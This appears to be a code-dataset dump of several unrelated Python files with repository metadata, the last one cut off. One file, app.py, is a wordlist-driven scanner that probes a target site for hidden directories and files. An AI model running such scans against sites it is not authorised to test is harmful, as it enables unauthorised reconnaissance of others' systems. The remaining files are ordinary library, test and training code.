hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb7c04ae2fc3b615c29c541ca3d198bb728ce9a1
| 2,868
|
py
|
Python
|
google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/customer_user_access_invitation.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 7
|
2021-02-21T10:39:41.000Z
|
2021-12-07T07:31:28.000Z
|
google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/customer_user_access_invitation.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 6
|
2021-02-02T23:46:11.000Z
|
2021-11-15T01:46:02.000Z
|
google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/customer_user_access_invitation.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 4
|
2021-01-28T23:25:45.000Z
|
2021-08-30T01:55:16.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v7.enums.types import access_invitation_status
from google.ads.googleads.v7.enums.types import access_role as gage_access_role
__protobuf__ = proto.module(
package='google.ads.googleads.v7.resources',
marshal='google.ads.googleads.v7',
manifest={
'CustomerUserAccessInvitation',
},
)
class CustomerUserAccessInvitation(proto.Message):
r"""Represent an invitation to a new user on this customer
account.
Attributes:
resource_name (str):
Immutable. Name of the resource. Resource names have the
form:
``customers/{customer_id}/customerUserAccessInvitations/{invitation_id}``
invitation_id (int):
Output only. The ID of the invitation.
This field is read-only.
access_role (google.ads.googleads.v7.enums.types.AccessRoleEnum.AccessRole):
Immutable. Access role of the user.
email_address (str):
Immutable. Email address the invitation was
sent to. This can differ from the email address
of the account that accepts the invite.
creation_date_time (str):
Output only. Time invitation was created.
This field is read-only.
The format is "YYYY-MM-DD HH:MM:SS".
Examples: "2018-03-05 09:15:00" or "2018-02-01
14:34:30".
invitation_status (google.ads.googleads.v7.enums.types.AccessInvitationStatusEnum.AccessInvitationStatus):
Output only. Invitation status of the user.
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
invitation_id = proto.Field(
proto.INT64,
number=2,
)
access_role = proto.Field(
proto.ENUM,
number=3,
enum=gage_access_role.AccessRoleEnum.AccessRole,
)
email_address = proto.Field(
proto.STRING,
number=4,
)
creation_date_time = proto.Field(
proto.STRING,
number=5,
)
invitation_status = proto.Field(
proto.ENUM,
number=6,
enum=access_invitation_status.AccessInvitationStatusEnum.AccessInvitationStatus,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| 32.590909
| 114
| 0.667364
|
4ba49027a7617d6b4fbc25d3f36287d7f9952deb
| 3,074
|
py
|
Python
|
app.py
|
codernayeem/web-directories-discoverer
|
7513a59fbe33f4e0a377e2d37f67ae7d0ce4c308
|
[
"MIT"
] | 1
|
2020-07-10T08:44:14.000Z
|
2020-07-10T08:44:14.000Z
|
app.py
|
codernayeem/web-directories-discoverer
|
7513a59fbe33f4e0a377e2d37f67ae7d0ce4c308
|
[
"MIT"
] | null | null | null |
app.py
|
codernayeem/web-directories-discoverer
|
7513a59fbe33f4e0a377e2d37f67ae7d0ce4c308
|
[
"MIT"
] | null | null | null |
import requests
from os.path import join
file_type_dict = {
'1': 'dir_',
'2': 'file_',
'3': 'file_php_',
'4': '(dir-file) '
}
word_type_dict = {
'1': 'all',
'2': 'common',
'3': 'crazy',
'4': 'extra'
}
def get_ans(qs):
while True:
ans = input(qs)
if ans.lower() == 'y':
return True
elif ans.lower() == 'n':
return False
def request(url):
try:
r = requests.get(url)
if r.status_code == 404:
return False
else:
return r.status_code
except Exception as e:
print('\n[!] - OOps. Got error.\n')
print(e, '\n')
return None
if __name__ == '__main__':
print('')
print('\t++++++++++++++++++++++++++++++++++++')
print('\t||| Web Directories Discoverer |||')
print('\t||| By @codernayeem |||')
print('\t====================================')
while True:
count = 0
save = ''
print('\n[+] - Enter Target link')
target = input('[?] --> ')
if target == '':
continue
if not (target.startswith('http://') or target.startswith('https://')):
target = 'http://' + target
if not target.endswith('/'):
target += '/'
print('\n---> Let\'s use buitin dictionaries! ')
while True:
print('\n--> Choose dictionary type? ')
print(' 1. Only Directory')
print(' 2. Only Files')
print(' 3. Only Files (PHP)')
print(' 4. Directory & Files')
ans = input('[>] ')
if ans in ['1', '2', '3', '4']:
file_type = ans
break
while True:
print('\n--> Choose words type? ')
print(' 1. All')
print(' 2. Common')
print(' 3. Crazy')
print(' 4. Extra')
ans = input('[>] ')
if ans in ['1', '2', '3', '4']:
word_type = ans
break
file_path = join('wordlist', file_type_dict[file_type] + word_type_dict[word_type] + '.wordlist')
try:
fl = open(file_path, 'r')
except:
print(f'[+] - Failed to open "{file_path}". Make sure that file exists.\n')
continue
directory_list = fl.read().strip().splitlines()
fl.close()
print('[+] - Searching started ...\n')
for a_item in directory_list:
a_item = a_item.strip()
if a_item != '':
link = target + a_item
response = request(link)
if response is None:
print('[+] - Got error. So we sttoped.')
break
elif response:
print(f'\n[+] - Got at - {link} - [{response}]')
count += 1
print(f'\n[!] - All done ({count})')
if not get_ans('\n[?] - Wanna try again? '):
exit(0)
| 27.945455
| 105
| 0.420299
|
8066c88d80723199425abc63c47807e5ee992971
| 561
|
py
|
Python
|
tests/test_priority.py
|
StefanBRas/todoist-taskwarrior
|
08dc877452d621a7c1ec3ed13de06d4c1fedb266
|
[
"MIT"
] | null | null | null |
tests/test_priority.py
|
StefanBRas/todoist-taskwarrior
|
08dc877452d621a7c1ec3ed13de06d4c1fedb266
|
[
"MIT"
] | 1
|
2021-03-11T04:56:02.000Z
|
2021-03-11T21:42:33.000Z
|
tests/test_priority.py
|
StefanBRas/todoist-taskwarrior
|
08dc877452d621a7c1ec3ed13de06d4c1fedb266
|
[
"MIT"
] | null | null | null |
""" Priority Tests
Test conversions between Todoist and Taskwarrior priorities.
"""
import pytest
from todoist_taskwarrior import utils
def test_priorities():
assert utils.ti_priority_to_tw(1) == None
assert utils.ti_priority_to_tw(2) == 'L'
assert utils.ti_priority_to_tw(3) == 'M'
assert utils.ti_priority_to_tw(4) == 'H'
def test_priorities_str():
assert utils.ti_priority_to_tw('1') == None
assert utils.ti_priority_to_tw('2') == 'L'
assert utils.ti_priority_to_tw('3') == 'M'
assert utils.ti_priority_to_tw('4') == 'H'
| 26.714286
| 60
| 0.709447
|
4b1951d9df2bda9a58b71890e7633aae9b44c161
| 6,676
|
py
|
Python
|
train.py
|
ycheng42/nerf_pl
|
a9e66a851907069f22423ca6ea4581e1657f9572
|
[
"MIT"
] | null | null | null |
train.py
|
ycheng42/nerf_pl
|
a9e66a851907069f22423ca6ea4581e1657f9572
|
[
"MIT"
] | null | null | null |
train.py
|
ycheng42/nerf_pl
|
a9e66a851907069f22423ca6ea4581e1657f9572
|
[
"MIT"
] | null | null | null |
import os, sys
from opt import get_opts
import torch
from collections import defaultdict
from torch.utils.data import DataLoader
from datasets import dataset_dict
# models
from models.nerf import Embedding, NeRF
from models.rendering import render_rays
# optimizer, scheduler, visualization
from utils import *
# losses
from losses import loss_dict
# metrics
from metrics import *
# pytorch-lightning
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning import LightningModule, Trainer
from pytorch_lightning.logging import TestTubeLogger
class NeRFSystem(LightningModule):
def __init__(self, hparams):
super(NeRFSystem, self).__init__()
self.hparams = hparams
self.loss = loss_dict[hparams.loss_type]()
self.embedding_xyz = Embedding(3, 10) # 10 is the default number
self.embedding_dir = Embedding(3, 4) # 4 is the default number
self.embeddings = [self.embedding_xyz, self.embedding_dir]
self.nerf_coarse = NeRF()
self.models = [self.nerf_coarse]
if hparams.N_importance > 0:
self.nerf_fine = NeRF()
self.models += [self.nerf_fine]
def decode_batch(self, batch):
rays = batch['rays'] # (B, 8)
rgbs = batch['rgbs'] # (B, 3)
return rays, rgbs
def forward(self, rays):
"""Do batched inference on rays using chunk."""
B = rays.shape[0]
results = defaultdict(list)
for i in range(0, B, self.hparams.chunk):
rendered_ray_chunks = \
render_rays(self.models,
self.embeddings,
rays[i:i+self.hparams.chunk],
self.hparams.N_samples,
self.hparams.use_disp,
self.hparams.perturb,
self.hparams.noise_std,
self.hparams.N_importance,
self.hparams.chunk, # chunk size is effective in val mode
self.train_dataset.white_back)
for k, v in rendered_ray_chunks.items():
results[k] += [v]
for k, v in results.items():
results[k] = torch.cat(v, 0)
return results
def prepare_data(self):
dataset = dataset_dict[self.hparams.dataset_name]
kwargs = {'root_dir': self.hparams.root_dir,
'img_wh': tuple(self.hparams.img_wh)}
if self.hparams.dataset_name == 'llff':
kwargs['spheric_poses'] = self.hparams.spheric_poses
kwargs['val_num'] = self.hparams.num_gpus
self.train_dataset = dataset(split='train', **kwargs)
self.val_dataset = dataset(split='val', **kwargs)
def configure_optimizers(self):
self.optimizer = get_optimizer(self.hparams, self.models)
scheduler = get_scheduler(self.hparams, self.optimizer)
return [self.optimizer], [scheduler]
def train_dataloader(self):
return DataLoader(self.train_dataset,
shuffle=True,
num_workers=4,
batch_size=self.hparams.batch_size,
pin_memory=True)
def val_dataloader(self):
return DataLoader(self.val_dataset,
shuffle=False,
num_workers=4,
batch_size=1, # validate one image (H*W rays) at a time
pin_memory=True)
def training_step(self, batch, batch_nb):
log = {'lr': get_learning_rate(self.optimizer)}
rays, rgbs = self.decode_batch(batch)
results = self(rays)
log['train/loss'] = loss = self.loss(results, rgbs)
typ = 'fine' if 'rgb_fine' in results else 'coarse'
with torch.no_grad():
psnr_ = psnr(results[f'rgb_{typ}'], rgbs)
log['train/psnr'] = psnr_
return {'loss': loss,
'progress_bar': {'train_psnr': psnr_},
'log': log
}
def validation_step(self, batch, batch_nb):
rays, rgbs = self.decode_batch(batch)
rays = rays.squeeze() # (H*W, 3)
rgbs = rgbs.squeeze() # (H*W, 3)
results = self(rays)
log = {'val_loss': self.loss(results, rgbs)}
typ = 'fine' if 'rgb_fine' in results else 'coarse'
if batch_nb == 0:
W, H = self.hparams.img_wh
img = results[f'rgb_{typ}'].view(H, W, 3).cpu()
img = img.permute(2, 0, 1) # (3, H, W)
img_gt = rgbs.view(H, W, 3).permute(2, 0, 1).cpu() # (3, H, W)
depth = visualize_depth(results[f'depth_{typ}'].view(H, W)) # (3, H, W)
stack = torch.stack([img_gt, img, depth]) # (3, 3, H, W)
self.logger.experiment.add_images('val/GT_pred_depth',
stack, self.global_step)
log['val_psnr'] = psnr(results[f'rgb_{typ}'], rgbs)
return log
def validation_epoch_end(self, outputs):
mean_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
mean_psnr = torch.stack([x['val_psnr'] for x in outputs]).mean()
return {'progress_bar': {'val_loss': mean_loss,
'val_psnr': mean_psnr},
'log': {'val/loss': mean_loss,
'val/psnr': mean_psnr}
}
if __name__ == '__main__':
hparams = get_opts()
system = NeRFSystem(hparams)
checkpoint_callback = ModelCheckpoint(filepath=os.path.join(f'ckpts/{hparams.exp_name}',
'{epoch:d}'),
monitor='val/loss',
mode='min',
save_top_k=5,)
logger = TestTubeLogger(
save_dir="logs",
name=hparams.exp_name,
debug=False,
create_git_tag=False
)
trainer = Trainer(max_epochs=hparams.num_epochs,
checkpoint_callback=checkpoint_callback,
resume_from_checkpoint=hparams.ckpt_path,
logger=logger,
early_stop_callback=None,
weights_summary=None,
progress_bar_refresh_rate=1,
gpus=hparams.num_gpus,
distributed_backend='ddp' if hparams.num_gpus>1 else None,
num_sanity_val_steps=1,
benchmark=True,
profiler=hparams.num_gpus==1)
trainer.fit(system)
| 36.480874
| 92
| 0.546585
|
e9ce08531942bd2a91b23ef305616808f5160fa7
| 17,821
|
py
|
Python
|
sdk/python/pulumi_aws/appmesh/virtual_node.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/appmesh/virtual_node.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/appmesh/virtual_node.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class VirtualNode(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
The ARN of the virtual node.
"""
created_date: pulumi.Output[str]
"""
The creation date of the virtual node.
"""
last_updated_date: pulumi.Output[str]
"""
The last update date of the virtual node.
"""
mesh_name: pulumi.Output[str]
"""
The name of the service mesh in which to create the virtual node.
"""
name: pulumi.Output[str]
"""
The name to use for the virtual node.
"""
spec: pulumi.Output[dict]
"""
The virtual node specification to apply.
* `backends` (`list`) - The backends to which the virtual node is expected to send outbound traffic.
* `virtualService` (`dict`) - Specifies a virtual service to use as a backend for a virtual node.
* `virtualServiceName` (`str`) - The name of the virtual service that is acting as a virtual node backend.
* `listener` (`dict`) - The listeners from which the virtual node is expected to receive inbound traffic.
* `health_check` (`dict`) - The health check information for the listener.
* `healthyThreshold` (`float`) - The number of consecutive successful health checks that must occur before declaring listener healthy.
* `interval_millis`- (Required) The time period in milliseconds between each health check execution.
* `intervalMillis` (`float`)
* `path` (`str`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `port` (`float`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`str`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `timeoutMillis` (`float`) - The amount of time to wait when receiving a response from the health check, in milliseconds.
* `unhealthyThreshold` (`float`) - The number of consecutive failed health checks that must occur before declaring a virtual node unhealthy.
* `portMapping` (`dict`) - The port mapping information for the listener.
* `port` (`float`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`str`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `logging` (`dict`) - The inbound and outbound access logging information for the virtual node.
* `accessLog` (`dict`) - The access log configuration for a virtual node.
* `file` (`dict`) - The file object to send virtual node access logs to.
* `path` (`str`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `serviceDiscovery` (`dict`) - The service discovery information for the virtual node.
* `awsCloudMap` (`dict`) - Specifies any AWS Cloud Map information for the virtual node.
* `attributes` (`dict`) - A string map that contains attributes with values that you can use to filter instances by any custom attribute that you specified when you registered the instance. Only instances that match all of the specified key/value pairs will be returned.
* `namespaceName` (`str`) - The name of the AWS Cloud Map namespace to use.
Use the [`servicediscovery.HttpNamespace`](https://www.terraform.io/docs/providers/aws/r/service_discovery_http_namespace.html) resource to configure a Cloud Map namespace.
* `serviceName` (`str`) - The name of the AWS Cloud Map service to use. Use the [`servicediscovery.Service`](https://www.terraform.io/docs/providers/aws/r/service_discovery_service.html) resource to configure a Cloud Map service.
* `dns` (`dict`) - Specifies the DNS service name for the virtual node.
* `hostname` (`str`) - The DNS host name for your virtual node.
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
def __init__(__self__, resource_name, opts=None, mesh_name=None, name=None, spec=None, tags=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an AWS App Mesh virtual node resource.
## Breaking Changes
Because of backward incompatible API changes (read [here](https://github.com/awslabs/aws-app-mesh-examples/issues/92)), `appmesh.VirtualNode` resource definitions created with provider versions earlier than v2.3.0 will need to be modified:
* Rename the `service_name` attribute of the `dns` object to `hostname`.
* Replace the `backends` attribute of the `spec` object with one or more `backend` configuration blocks,
setting `virtual_service_name` to the name of the service.
The state associated with existing resources will automatically be migrated.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] mesh_name: The name of the service mesh in which to create the virtual node.
:param pulumi.Input[str] name: The name to use for the virtual node.
:param pulumi.Input[dict] spec: The virtual node specification to apply.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **spec** object supports the following:
* `backends` (`pulumi.Input[list]`) - The backends to which the virtual node is expected to send outbound traffic.
* `virtualService` (`pulumi.Input[dict]`) - Specifies a virtual service to use as a backend for a virtual node.
* `virtualServiceName` (`pulumi.Input[str]`) - The name of the virtual service that is acting as a virtual node backend.
* `listener` (`pulumi.Input[dict]`) - The listeners from which the virtual node is expected to receive inbound traffic.
* `health_check` (`pulumi.Input[dict]`) - The health check information for the listener.
* `healthyThreshold` (`pulumi.Input[float]`) - The number of consecutive successful health checks that must occur before declaring listener healthy.
* `interval_millis`- (Required) The time period in milliseconds between each health check execution.
* `intervalMillis` (`pulumi.Input[float]`)
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `timeoutMillis` (`pulumi.Input[float]`) - The amount of time to wait when receiving a response from the health check, in milliseconds.
* `unhealthyThreshold` (`pulumi.Input[float]`) - The number of consecutive failed health checks that must occur before declaring a virtual node unhealthy.
* `portMapping` (`pulumi.Input[dict]`) - The port mapping information for the listener.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `logging` (`pulumi.Input[dict]`) - The inbound and outbound access logging information for the virtual node.
* `accessLog` (`pulumi.Input[dict]`) - The access log configuration for a virtual node.
* `file` (`pulumi.Input[dict]`) - The file object to send virtual node access logs to.
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `serviceDiscovery` (`pulumi.Input[dict]`) - The service discovery information for the virtual node.
* `awsCloudMap` (`pulumi.Input[dict]`) - Specifies any AWS Cloud Map information for the virtual node.
* `attributes` (`pulumi.Input[dict]`) - A string map that contains attributes with values that you can use to filter instances by any custom attribute that you specified when you registered the instance. Only instances that match all of the specified key/value pairs will be returned.
* `namespaceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map namespace to use.
Use the [`servicediscovery.HttpNamespace`](https://www.terraform.io/docs/providers/aws/r/service_discovery_http_namespace.html) resource to configure a Cloud Map namespace.
* `serviceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map service to use. Use the [`servicediscovery.Service`](https://www.terraform.io/docs/providers/aws/r/service_discovery_service.html) resource to configure a Cloud Map service.
* `dns` (`pulumi.Input[dict]`) - Specifies the DNS service name for the virtual node.
* `hostname` (`pulumi.Input[str]`) - The DNS host name for your virtual node.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/appmesh_virtual_node.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if mesh_name is None:
raise TypeError("Missing required property 'mesh_name'")
__props__['mesh_name'] = mesh_name
__props__['name'] = name
if spec is None:
raise TypeError("Missing required property 'spec'")
__props__['spec'] = spec
__props__['tags'] = tags
__props__['arn'] = None
__props__['created_date'] = None
__props__['last_updated_date'] = None
super(VirtualNode, __self__).__init__(
'aws:appmesh/virtualNode:VirtualNode',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, created_date=None, last_updated_date=None, mesh_name=None, name=None, spec=None, tags=None):
"""
Get an existing VirtualNode resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN of the virtual node.
:param pulumi.Input[str] created_date: The creation date of the virtual node.
:param pulumi.Input[str] last_updated_date: The last update date of the virtual node.
:param pulumi.Input[str] mesh_name: The name of the service mesh in which to create the virtual node.
:param pulumi.Input[str] name: The name to use for the virtual node.
:param pulumi.Input[dict] spec: The virtual node specification to apply.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **spec** object supports the following:
* `backends` (`pulumi.Input[list]`) - The backends to which the virtual node is expected to send outbound traffic.
* `virtualService` (`pulumi.Input[dict]`) - Specifies a virtual service to use as a backend for a virtual node.
* `virtualServiceName` (`pulumi.Input[str]`) - The name of the virtual service that is acting as a virtual node backend.
* `listener` (`pulumi.Input[dict]`) - The listeners from which the virtual node is expected to receive inbound traffic.
* `health_check` (`pulumi.Input[dict]`) - The health check information for the listener.
* `healthyThreshold` (`pulumi.Input[float]`) - The number of consecutive successful health checks that must occur before declaring listener healthy.
* `interval_millis`- (Required) The time period in milliseconds between each health check execution.
* `intervalMillis` (`pulumi.Input[float]`)
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `timeoutMillis` (`pulumi.Input[float]`) - The amount of time to wait when receiving a response from the health check, in milliseconds.
* `unhealthyThreshold` (`pulumi.Input[float]`) - The number of consecutive failed health checks that must occur before declaring a virtual node unhealthy.
* `portMapping` (`pulumi.Input[dict]`) - The port mapping information for the listener.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `logging` (`pulumi.Input[dict]`) - The inbound and outbound access logging information for the virtual node.
* `accessLog` (`pulumi.Input[dict]`) - The access log configuration for a virtual node.
* `file` (`pulumi.Input[dict]`) - The file object to send virtual node access logs to.
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `serviceDiscovery` (`pulumi.Input[dict]`) - The service discovery information for the virtual node.
* `awsCloudMap` (`pulumi.Input[dict]`) - Specifies any AWS Cloud Map information for the virtual node.
* `attributes` (`pulumi.Input[dict]`) - A string map that contains attributes with values that you can use to filter instances by any custom attribute that you specified when you registered the instance. Only instances that match all of the specified key/value pairs will be returned.
* `namespaceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map namespace to use.
Use the [`servicediscovery.HttpNamespace`](https://www.terraform.io/docs/providers/aws/r/service_discovery_http_namespace.html) resource to configure a Cloud Map namespace.
* `serviceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map service to use. Use the [`servicediscovery.Service`](https://www.terraform.io/docs/providers/aws/r/service_discovery_service.html) resource to configure a Cloud Map service.
* `dns` (`pulumi.Input[dict]`) - Specifies the DNS service name for the virtual node.
* `hostname` (`pulumi.Input[str]`) - The DNS host name for your virtual node.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/appmesh_virtual_node.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["created_date"] = created_date
__props__["last_updated_date"] = last_updated_date
__props__["mesh_name"] = mesh_name
__props__["name"] = name
__props__["spec"] = spec
__props__["tags"] = tags
return VirtualNode(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 65.040146
| 298
| 0.663319
|
f684aeb34dd6cf55e4aa35a12a26645851d03c3d
| 2,631
|
py
|
Python
|
sdk/core/azure-core/setup.py
|
cicovica/azure-sdk-for-python
|
cd8bed878f8a11d081358bf67400fb01031582b6
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/setup.py
|
cicovica/azure-sdk-for-python
|
cd8bed878f8a11d081358bf67400fb01031582b6
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/setup.py
|
cicovica/azure-sdk-for-python
|
cd8bed878f8a11d081358bf67400fb01031582b6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import re
import os.path
from io import open
from setuptools import find_packages, setup # type: ignore
# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-core"
PACKAGE_PPRINT_NAME = "Core"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, '_version.py'), 'r') as fd:
version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', # type: ignore
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
with open('README.md', encoding='utf-8') as f:
readme = f.read()
with open('CHANGELOG.md', encoding='utf-8') as f:
changelog = f.read()
setup(
name=PACKAGE_NAME,
version=version,
include_package_data=True,
description='Microsoft Azure {} Library for Python'.format(PACKAGE_PPRINT_NAME),
long_description=readme + '\n\n' + changelog,
long_description_content_type='text/markdown',
license='MIT License',
author='Microsoft Corporation',
author_email='azpysdkhelp@microsoft.com',
url='https://github.com/Azure/azure-sdk-for-python/tree/master/sdk/core/azure-core',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'License :: OSI Approved :: MIT License',
],
zip_safe=False,
packages=find_packages(exclude=[
'tests',
# Exclude packages that will be covered by PEP420 or nspkg
'azure',
]),
package_data={
'pytyped': ['py.typed'],
},
install_requires=[
'requests>=2.18.4',
'six>=1.6',
],
extras_require={
":python_version<'3.0'": ['azure-nspkg'],
":python_version<'3.4'": ['enum34>=1.0.4'],
":python_version<'3.5'": ['typing'],
}
)
| 33.730769
| 88
| 0.596351
|
8d9ca0dff8f6497ba3d17a72fede976aaabfe8d6
| 6,995
|
py
|
Python
|
dynehr/model.py
|
jacobdeasy/dynamic-ehr
|
b01d5cd17b577c457a050daedc765939eaa114dc
|
[
"MIT"
] | 2
|
2020-10-12T13:50:42.000Z
|
2021-05-18T07:03:31.000Z
|
dynehr/model.py
|
jacobdeasy/dynamic-ehr
|
b01d5cd17b577c457a050daedc765939eaa114dc
|
[
"MIT"
] | null | null | null |
dynehr/model.py
|
jacobdeasy/dynamic-ehr
|
b01d5cd17b577c457a050daedc765939eaa114dc
|
[
"MIT"
] | 1
|
2020-09-23T22:21:55.000Z
|
2020-09-23T22:21:55.000Z
|
"""Module containing the main model class."""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from math import e, pi
from scipy.stats import truncnorm
from torch.nn import Parameter
from torch import tensor, Tensor
from dynehr.lstms import LSTM
from utils.helpers import get_device
class Embedding(nn.Module):
def __init__(self, n_tokens, emb_dim,
variational=False,
prior_std=0.25):
"""
Embedding class with built-in variational option.
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
Dimensionality embedding space
variational : bool, optional
Whether to use a variational embedding
prior_std : float, optional
Standard deviation of Gaussian prior for variational embedding
"""
